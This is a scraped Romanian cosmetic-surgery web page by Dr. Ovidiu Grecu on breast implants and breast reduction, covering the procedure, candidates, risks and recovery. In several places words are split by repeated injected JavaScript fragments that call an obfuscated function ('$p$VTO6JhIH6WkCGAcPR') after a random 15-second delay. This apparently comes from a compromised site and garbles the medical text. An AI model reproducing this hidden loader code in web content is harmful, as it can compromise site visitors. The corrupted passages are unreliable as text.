surgery_body_en

Dr. Ovidiu Grecu

Despre operatii estetice

Operatiile estetice au menirea de-a imbunatati acele parti ale
corpului nostru care nu sunt dezvoltate perfect sau in
asimetrie cu restul caracteristicilor anatomice ale corpului.
bkgd31

Dr. Ovidiu Grecu

Proteze Mamare

Implanturile mamare sunt de diferite tipuri si forme,
cu diferite invelisuri si continuturi. Impreuna cu
chirurgul dumneavoastra veti alege tipul si forma protezei,
pentru a putea ajunge la rezultatul care-l doriti.

Mamoreductie

Dr. Ovidiu Grecu – Expertul tau in operatii estetice

Prin mamoreductie se reuseste micsorarea sanilor de dimensiuni mari. Pacientele care recurg la aceasta interventie acuza dureri de spate, gat si umeri din pricina greutatii sanilor.     

Miscarea este mai greoaie si activitatile fizice sunt limitate din pricina disconfortului creat de sanii voluminosi. Pe langa acestea, sanii mari sunt mai greu de gestionat, pe timpul verii din cauza transpiratiei apar iritatii locale sau eczeme cauzate de pielea in exces care atarna.
Sanul mare prezinta areola de dimensiuni mari, largita si inestetica.

Interventia chirurgicala
In principiu mamoreductia consta in indepartarea surplusului glandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andular precum si a pielii in exces astfel incat noul san sa beneficieze de o marime, forma si pozitionare normale in raport cu intregul corp. Acest deziderat se realizeaza prin aplicarea unor incizii de abord in jurul areolei si in santul inframamar astfel incat sa permita viitoarelor cicatrici o vindecare fiziologica si o cat mai buna camuflare a lor.

mamoreductie

Important
Prin mamoreductie se poate obtine:
-Micsorarea dorita a volumului si greutatii sanilor
-Accentuarea proiectiei sanilor
-Ascensionarea areolelor si micsorarea lor
-Rezolvarea eventualelor asimetrii

Micsorarea sanilor poate fi efectuata la orice varsta, dar ideal candom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and sanul este complet dezvoltat.
Deoarece o cantitate mai mare sau mai mica de tesut glandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andular este indepartata, operatia de micsorare a sanilor poate afecta ulterior alaptarea. Modificarile de la nivelul sanului care survin in cursul sarcinii  precum si variatiile mari ale greutatii corpului pot altera rezultatele unei mamoreductii efectuata anterior.

Pacientele care pot apela la aceasta interventie sunt sanatoase, fara afectiuni care sa influenteze procesul de vindecare.
Starea de sanatate are o importanta deosebita pentru obtinerea unui rezultat bun al mamoreductiei si aceasta trebuie evaluata inaintea interventiei chirurgicale. Succesul procedurii, siguranta si rezultatele mamoreductiei necesita ca pacienta sa-si exprime deschis dorinta fata de  chirurgul estetician.

Antecedentele medicale, consumul de medicamente, vitamine, suplimente naturale,  alcool, tutun, droguri sa fie aduse la cunostinta chirurgului estetician.

Pacienta sa urmeze intotdeauna doar indicatiile chirurgului estetician.
Posibilele riscuri ale interventiei chirurgicale de mamoreductie sunt reprezentate de hematoame, cicatrici vicioase si modificarea sensibilitatii mamelonului sau a sanului, sensibilitate care este de obicei temporara.
In incheierea interventiei chirurgicale, inciziile sunt pansate si pacienta va imbraca  un sutien special (bustiera) este aplicat pentru a reduce edemul postoperator, sustine sanul si ajuta procesul de vindecare.


Primele zile dupa operatie, in procesul de vindecare poate aparea un edem, inflamatie si/sau disconfort la nivelul inciziilor si al sanilor în general. Disconfortul sau durerea sunt comune oricarei interventii chirurgicale si se controleaza medicamentos. Este recomandom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andat ca bustiera sa fie purtata 6 saptamani. Revenirea la activitatile usoare, normale este posibila la cateva zile dupa operatie.
Plaga incepe sa se vindece iar dupa 14 zile de la operatie vor fi extrase firele nerasorbabile.

Pacienta poate reincepe munca si activitatile normale atat timp cat nu efectueaza efort fizic.
Procesul de vindecare continua in urmatoarele saptamani, timp in care edemul postoperator se reduce si cicatricile postoperatorii se atenueaza.

Rezultatul final va aparea in decurs de cateva luni, timp in care se definitiveaza forma si pozitia sanilor. Liniile de incizie sunt permanente, dar in timp  vor fi foarte greu de sesizat.
Efectele operatiei de mamoredutie  sunt  permanente, desi in decursul anilor, sanul va continua sa se modifice din cauza variatiilor de greutate, graviditatii si a procesului de imbatranire.
In timpul  consultatiei medicale cu chirurgul dumneavoastra, veti fi informata asupra tuturor posibilitatilor si limitelor impuse de aceasta interventie.

Suna Acum!
Navigheaza!